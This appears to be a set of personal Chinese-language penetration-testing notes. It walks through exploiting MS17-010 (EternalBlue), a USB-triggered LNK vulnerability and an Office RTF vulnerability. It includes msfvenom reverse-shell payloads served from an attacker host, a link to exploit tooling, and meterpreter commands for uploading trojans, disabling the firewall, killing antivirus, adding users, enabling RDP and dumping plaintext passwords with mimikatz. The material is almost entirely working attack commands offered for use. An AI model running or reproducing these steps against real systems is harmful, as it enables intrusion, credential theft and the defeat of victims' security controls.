ms17-010(smb 445)
1、漏洞检测
运行数据库service postgresql start
启动msfconsolemsfconsole -q
使用smb_ms17_010模块探测MS17-010漏洞use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.1.134
2、把扫描结果进行ms17-010漏洞检测
使用攻击模块use exploit/windows/smb/ms17_010_eternalblue
option(or info)查看参数set rhost 192.168.1.134
这需要路由器开放端口,才能返弹set payload windows/x64/meterpreter/reverse_tcp
这直接绑定set payload windows/x64/meterpreter/bind_tcp
run运行
CVE-2017-8464(震网漏洞)
插上U盘即中招
cp -r /root/.msf4/local/ /root/1
|
|
这里需要注意的是生成的必须放在U盘的根目录(因为需要驱动,坑好久才成功)
CVE-2017-8570(office)
只要接受者打开文本即中招
链接:http://pan.baidu.com/s/1dF4J4PF 密码:vn0gpython cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.1.20/test.txt
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=4444 -f exe > shell.exe
python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.20/shell.exe -l shell.exe
|
|
meterpreter的基本命令
1.getwd命令:可以获取当前目标机器的工作目录,也可以获得当前系统的工作目录,getuid,getpid
2.upload命令:可以上传文件或文件夹到目标机器upload /root/muma.py d:\\
3.download命令:从目标机器上下载文件夹或者文件到攻击机download muma.py /root
4.search命令:支持对远程目标机器上的文件进行搜索
5.portfwd命令:这个是meterpreter内嵌的端口转发器,目标主机开放的远程桌面3389端口portfwd add -l 3389 -r 10.21.13.225 -p 3389
这条命令也可以开启3389远程桌面run post/windows/manage/enable_rdp
或run getgui -e
6.ps命令可以用来获取目标主机上正在运行的进程信息
7.migrate命令,将当前meterpreter会话从一个进程移植到另外一个进程的内存空间中,如果该程序中断,meterpreter也会中断migrate 10652(pid)
8.execute命令:可以在目标机中执行文件execute -H -f cmd.exe
9.关闭目标机器的防火墙netsh adcfirewall set allprofiles state off
10.添加用户run getgui -u xxxxx -p xxxxx
11.关闭杀毒软件run killav
12.屏幕截图screenshot
13.shell进入windows命令行,exit()回到meterpreter
14.打开cmd命令行,看看已打开的端口netstat -ano
15.测试是不是虚拟机run post/windows/gather/checkvm
16.获取明文账号和密码load mimikatz
kerberos
msv
远程连接mstsc